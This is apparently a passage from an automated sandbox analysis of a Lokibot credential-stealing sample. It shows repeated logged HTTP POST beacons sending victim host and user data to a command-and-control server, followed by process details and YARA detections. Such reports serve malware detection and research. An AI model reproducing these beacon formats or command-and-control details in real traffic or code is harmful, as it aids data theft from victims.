                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:07:15.268397093 CEST6569OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:07:15.612334013 CEST7092INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:51 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        36192.168.2.44981288.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:07:18.160223961 CEST7109OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:07:18.187339067 CEST7109OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:07:18.596982956 CEST7110INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:54 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        37192.168.2.44981388.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:07:20.640279055 CEST7110OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:07:20.667494059 CEST7111OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:07:21.051803112 CEST7111INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:57 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        38192.168.2.44981488.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:07:24.436443090 CEST7112OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:07:24.463587999 CEST7112OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:07:24.858928919 CEST7112INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:07:01 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        39192.168.2.44981588.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:07:26.425494909 CEST7113OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:07:26.452280045 CEST7114OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:07:26.831839085 CEST7114INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:07:03 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        4192.168.2.44976488.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:05:53.814872980 CEST1233OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:05:53.843362093 CEST1233OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:05:54.312279940 CEST1234INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:30 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        40192.168.2.44981688.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:07:29.254760027 CEST7115OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:07:29.281842947 CEST7115OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:07:29.679425955 CEST7116INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:07:05 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        41192.168.2.44981888.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:07:32.582865953 CEST7121OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:07:32.610034943 CEST7121OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:07:33.087141037 CEST7121INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:07:09 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        42192.168.2.44981988.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:07:34.959527016 CEST7122OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:07:34.986819983 CEST7123OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:07:35.421030998 CEST7123INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:07:11 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        43192.168.2.44982088.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:07:36.164319038 CEST7124OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:07:36.192192078 CEST7124OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:07:36.607784033 CEST7124INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:07:12 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        5192.168.2.44976588.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:05:56.623177052 CEST1235OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:05:56.650676966 CEST1235OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:05:57.102046013 CEST1235INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:33 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        6192.168.2.44976788.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:05:58.579153061 CEST1324OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:05:58.606503963 CEST1325OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:05:59.063198090 CEST1325INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:35 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        7192.168.2.44976988.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:01.435904026 CEST1339OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:01.462996006 CEST1339OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:01.883214951 CEST1351INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:38 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        8192.168.2.44977188.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:03.575680971 CEST1352OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:03.602721930 CEST1352OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:03.992033958 CEST1354INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:40 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        9192.168.2.44977788.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:09.141151905 CEST1384OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:09.168397903 CEST1384OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:09.618552923 CEST1385INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:45 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:17:05:30
                        Start date:04/05/2022
                        Path:C:\Users\user\Desktop\dhGoVvfmul.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\dhGoVvfmul.exe"
                        Imagebase:0x400000
                        File size:125839 bytes
                        MD5 hash:5C5D4E3E0DADFF03DA7B9878ACF3E706
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        Target ID:1
                        Start time:17:05:31
                        Start date:04/05/2022
                        Path:C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl
                        Imagebase:0x400000
                        File size:4096 bytes
                        MD5 hash:99DF91CF3E9775BE40FE27FEFA10C203
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Antivirus matches:
                        • Detection: 46%, Virustotal, Browse
                        • Detection: 24%, ReversingLabs
                        Reputation:low

                        Target ID:2
                        Start time:17:05:32
                        Start date:04/05/2022
                        Path:C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl
                        Imagebase:0x400000
                        File size:4096 bytes
                        MD5 hash:99DF91CF3E9775BE40FE27FEFA10C203
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.519895999.0000000000607000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
